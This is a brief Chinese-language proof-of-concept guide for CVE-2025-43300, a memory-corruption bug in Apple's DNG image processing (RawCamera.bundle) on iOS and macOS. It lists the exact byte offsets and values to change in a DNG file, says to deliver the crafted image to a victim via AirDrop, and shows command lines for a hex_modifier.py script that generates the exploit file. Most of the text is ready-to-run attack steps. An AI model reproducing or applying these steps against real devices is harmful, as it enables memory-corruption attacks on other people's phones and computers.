CVE-2025-43300:iOS/macOS DNG 图像处理内存损坏
Apple 图像处理(RawCamera.bundle)中的一个漏洞影响 iOS 18.6.1 和 macOS。当 DNG 文件包含不匹配的 TIFF 元数据 与 JPEG 无损参数 时,会导致内存损坏。
下载 DNG 分辨率的图像
修改以下字节:
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
通过隔空投送(AirDrop)等方式传输
# Create POC using known vulnerable offsets
python3 hex_modifier.py create-poc <input.dng>
# Manual byte modification
python3 hex_modifier.py modify <input.dng> <offset> <old_byte> <new_byte> <output.dng>
# Generate diff report
python3 hex_modifier.py diff <original.dng> <modified.dng>